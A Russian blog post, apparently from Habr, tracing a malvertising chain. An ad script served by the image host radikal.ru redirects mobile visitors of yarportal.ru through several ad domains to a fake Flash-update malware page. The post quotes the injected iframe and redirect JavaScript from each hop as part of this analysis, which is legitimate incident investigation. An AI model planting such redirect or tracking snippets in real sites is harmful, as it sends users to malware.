Вирусы с радикала. Опять! :(

в 17:19, , рубрики: drweb, radikal.ru, хабрахабр, метки: ,

История началась с смски «срочно выйди в скайп» — писал клиент, хозяин одного из сайтов, которому я помогаю в обеспечении жизнедеятельности этого самого сайта. Оказалось, он получил письмо от некоего Alexander Goryachev с утверждением, что сайт скорее всего заражен.

Вот текст письма:

Здравствуйте.

Меня зовут Александр Горячев, я аналитик компании «Доктор Веб».

Имеется информация, что при открытии изображений в данной теме yarportal.ru/topic324608s0.html на формуе yarportal.ru происходит переадресация с сайта-хостинга radikal.ru на мошеннический сайт, который распространяет вредоносные программы для мобильных устройств под видом обновлений ПО. То есть если используется мобильное устройства (телефон, смартфон), то сначала открывается страничка radikal.ru с нужным изображением, но затем почти сразу происходит перенаправление на мошеннический сайт (пример — newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). Если открывать изображения непосредственно на самом хостинге, без промежуточного звена в лице yarportal.ru, такого поведения не наблюдается. Возможно, yarportal.ru был взломан или на нем используется недобросовестная рекламная модель, о которой владельцы портала могут и не знать.

Из контактной информации наиболее подходящим был ваш, поэтому было решено сообщить по нему. Можете ли вы как-то прокомментировать ситуацию и заняться решением данного вопроса? Будем признательны, если вы сможете предоставить какую-либо информацию.

Спасибо.

Попытался повторить его действия и посканить трафик, который при этом идет на мобильное устройство. Действительно, редирект на этот самый newbrwzer происходит, но не совсем понятно, при чем тут наш сайт. Анализ трафика показал, что вредоносную ссылку выдает сам радикал примерно следующим путем:

$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port
<script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>

Далее это отсылает браузер на страницу вида:

http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en

Где встречается следующий код:

<script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script>

По ссылке adv-port.com/ctr.php?ref='+document.referrer+' имеется следующий код:

function error() {
 top.location='http://network-sitead.com/';
}

По этой ссылке есть следующий код:

<script src='https://on-line-adv.com/2.php'></script>

Загрузка этой ссылки выдает следующее:

document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'

Т.е. в конце-концов браузер действительно попадает на страничку с предложением «обновить» флеш-плеер. Чуть позже выяснилось, что некоторые пользователи действительно «обновляют» его: yarportal.ru/topic332505.html

По итогам этого «расследования» возникает 3 вопроса:

  1. Когда радикал умрет с такой своей рекламной политикой? Это уже далеко не первый случай распространения вирусов через них.
  2. Откуда в Dr.Web берут таких аналитиков, которые не удосуживаются посмотреть на трафик через wireshark/tcpdump?
  3. А может это просто я дурак и сайт действительно заражен? :)

PS: Аналитик действительно имеет отношение к Dr.Web, его статья есть на хабре в оф. блоге компании habrahabr.ru/company/drweb/blog/142993/

Автор: michaek


* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js